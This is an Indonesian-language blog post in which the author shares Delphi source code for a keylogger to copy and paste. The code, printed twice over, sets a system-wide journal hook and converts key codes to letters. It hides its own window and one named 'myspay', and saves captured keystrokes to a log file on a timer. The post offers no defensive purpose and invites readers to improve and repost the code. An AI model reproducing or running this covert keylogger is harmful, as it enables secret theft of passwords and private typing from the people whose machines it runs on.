Berawal rasa ingin tahu bagai mana sebuah key loger bekerja, saya coba-coba cari pake om google,ternyata nongol juga sebuah kode sederhana.(tapi saya lupa lagi siapa yang punya tulisan tersebut jadi nggak bisa ngasih tau linknya sory).dengan sedikit perubahan dan penambahan akhirnya program keylogger yang super acak acakan ini bisa saya postingkan.(maksaken pisan ie mah).
kodenya tinggal di copas>>>
unit keylog;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
type
TForm1 = class(TForm)
Panel1: TPanel;
mlog: TMemo;
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
type t_evt = ^EVENTMSG;
var
Form1: TForm1;
hookhandle : HHOOK;
bla : string;
implementation
{$R *.dfm}
function JournalCallBackProc(Code: Integer; wParam, lParam: longint): LRESULT;stdcall;
var y : string ;
var x : cardinal ;
var ev : t_evt;
begin
ev := ptr(lParam);
x := ev.paramL ;
if ev.message = 256 then begin
case x of
283 : UnhookWindowsHookEx(hookhandle);
7745 : y := 'a' ;
12354 : y :='b';
11843 : y :='c' ;
8260 : Y := 'd' ;
4677 : y := 'e' ;
8518 : y := 'f' ;
8775 : Y := 'g' ;
9032 : y := 'h' ;
5961 : y := 'i' ;
9290 : y := 'j' ;
9547 : y := 'k' ;
9804 : y := 'l' ;
12877 : y :='m' ;
12622 : y :='n' ;
6223 : y := 'o' ;
6480 : y := 'p' ;
4177 : y := 'q' ;
4946 : y := 'r' ;
8019 : y := 's' ;
5204 : y := 't' ;
5717 : y := 'u' ;
12118 : y :='v' ;
4439 : y := 'w' ;
11608 : y :='x' ;
11353 : y :='y' ;
5466 : y := 'z' ;
14627 : y := '';
14624 : y := ' ' ;
7181 : form1.mLog.Lines.Add(' ');
end;
end;
bla := y ;
form1.mLog.Text := form1.mLog.Text + y ;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
form1.Hide;
hookhandle := SetWindowsHookEx(WH_JOURNALRECORD, @JournalCallBackProc , Hinstance, 0);
if hookhandle = 0 then begin
mLog.Lines.Add('Hook Failed');
end
else begin
mLog.Lines.Add('Hooked');
end;
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
mlog.Lines.SaveToFile('key.log');
end;
procedure TForm1.Timer2Timer(Sender: TObject);
begin
showwindow(findwindow(nil,'form1'),sw_hide);
showwindow(findwindow(nil,'myspay'),sw_hide);
end;
end.
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
type
TForm1 = class(TForm)
Panel1: TPanel;
mlog: TMemo;
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
type t_evt = ^EVENTMSG;
var
Form1: TForm1;
hookhandle : HHOOK;
bla : string;
implementation
{$R *.dfm}
function JournalCallBackProc(Code: Integer; wParam, lParam: longint): LRESULT;stdcall;
var y : string ;
var x : cardinal ;
var ev : t_evt;
begin
ev := ptr(lParam);
x := ev.paramL ;
if ev.message = 256 then begin
case x of
283 : UnhookWindowsHookEx(hookhandle);
7745 : y := 'a' ;
12354 : y :='b';
11843 : y :='c' ;
8260 : Y := 'd' ;
4677 : y := 'e' ;
8518 : y := 'f' ;
8775 : Y := 'g' ;
9032 : y := 'h' ;
5961 : y := 'i' ;
9290 : y := 'j' ;
9547 : y := 'k' ;
9804 : y := 'l' ;
12877 : y :='m' ;
12622 : y :='n' ;
6223 : y := 'o' ;
6480 : y := 'p' ;
4177 : y := 'q' ;
4946 : y := 'r' ;
8019 : y := 's' ;
5204 : y := 't' ;
5717 : y := 'u' ;
12118 : y :='v' ;
4439 : y := 'w' ;
11608 : y :='x' ;
11353 : y :='y' ;
5466 : y := 'z' ;
14627 : y := '';
14624 : y := ' ' ;
7181 : form1.mLog.Lines.Add(' ');
end;
end;
bla := y ;
form1.mLog.Text := form1.mLog.Text + y ;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
form1.Hide;
hookhandle := SetWindowsHookEx(WH_JOURNALRECORD, @JournalCallBackProc , Hinstance, 0);
if hookhandle = 0 then begin
mLog.Lines.Add('Hook Failed');
end
else begin
mLog.Lines.Add('Hooked');
end;
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
mlog.Lines.SaveToFile('key.log');
end;
procedure TForm1.Timer2Timer(Sender: TObject);
begin
showwindow(findwindow(nil,'form1'),sw_hide);
showwindow(findwindow(nil,'myspay'),sw_hide);
end;
end.
Berbeda dengan posting contoh program sebelumnya,saya tidak akan menerang kan program ini di sini tapi nanti saya bahas fungsi dan procedur nya di posting berikutnya.
Kalau mau ngepost kode di atas saya harap di tambah dan di kurangi terlebih dahulu supaya kode diatas menjadi lebih baik.( nggak acak acakan.)
1 comment:
Hi,
I recently came across your blog and have been reading along. I thought I would leave my first comment. I don't know what to say except that I have enjoyed reading. Nice blog. I will keep visiting this blog very often.
-
Delphi development
Post a Comment